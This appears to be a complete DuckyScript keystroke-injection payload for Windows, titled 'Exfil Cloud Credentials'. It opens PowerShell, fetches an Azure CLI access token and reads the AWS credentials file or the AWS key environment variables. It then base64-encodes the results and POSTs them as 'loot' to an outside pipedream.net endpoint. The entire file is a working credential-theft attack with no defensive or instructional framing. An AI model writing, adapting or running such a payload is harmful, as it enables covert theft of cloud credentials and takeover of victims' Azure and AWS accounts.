1
REM Title: Exfil Cloud Credentials
2
REM Author: github.com/jasonotu
3
REM Description: Exfils Azure access token and AWS keys using respective CLI
4
REM Target: Windows
5
REM Version: 1.0
6
REM Category: Exfiltration
7
DEFAULTDELAY 10
8

9
DEFINE #ENDPOINT https://xxxxxxxxxxxxxxxx.m.pipedream.net
10

11
DELAY 1000
12
REM Open Run dialog
13
GUI r
14
DELAY 500
15
REM Type "powershell" to open PowerShell
16
STRING powershell
17
ENTER
18
DELAY 1000
19

20
REM Get access token from authenticated Azure CLI
21
STRING $userProfile = [System.Environment]::GetFolderPath([System.Environment+SpecialFolder]::UserProfile)
22
ENTER
23
STRING $token = az account get-access-token
24
ENTER
25
STRING ($az_encoded = [Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($token)))
26
ENTER
27
DELAY 3000
28

29
REM Get AWS keys
30
STRING $creds = $userProfile + "\.aws\credentials"
31
ENTER
32
STRING echo $creds
33
ENTER
34
STRING $keys = if (Test-Path -Path $creds -PathType Leaf) {Get-Content -Path $creds} else
35
ENTER 
36
STRING {echo "AWS_ACCESS_KEY_ID = ${env:AWS_ACCESS_KEY_ID} AWS_SECRET_ACCESS_KEY = ${env:AWS_SECRET_ACCESS_KEY}"}
37
ENTER
38
STRING $aws_encoded = [Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($keys))
39
ENTER
40

41
REM Got the loot, exfil
42
STRING $endpoint = ''
43
ENTER
44
STRING $loot = '{""az"":""' + $az_encoded + '"",""aws"":""' + $aws_encoded + '""}'
45
ENTER
46
DELAY 500
47
REM Send the HTTP request
48
STRING $response = Invoke-RestMethod -Uri #ENDPOINT -Method Post -ContentType 'application/json' -Body $loot
49
ENTER
50
DELAY 1000
51
REM Display the response
52
STRING $response
53
ENTER
54
DELAY 1000
55
REM Exit PowerShell
56
STRING exit
57
ENTER
58

59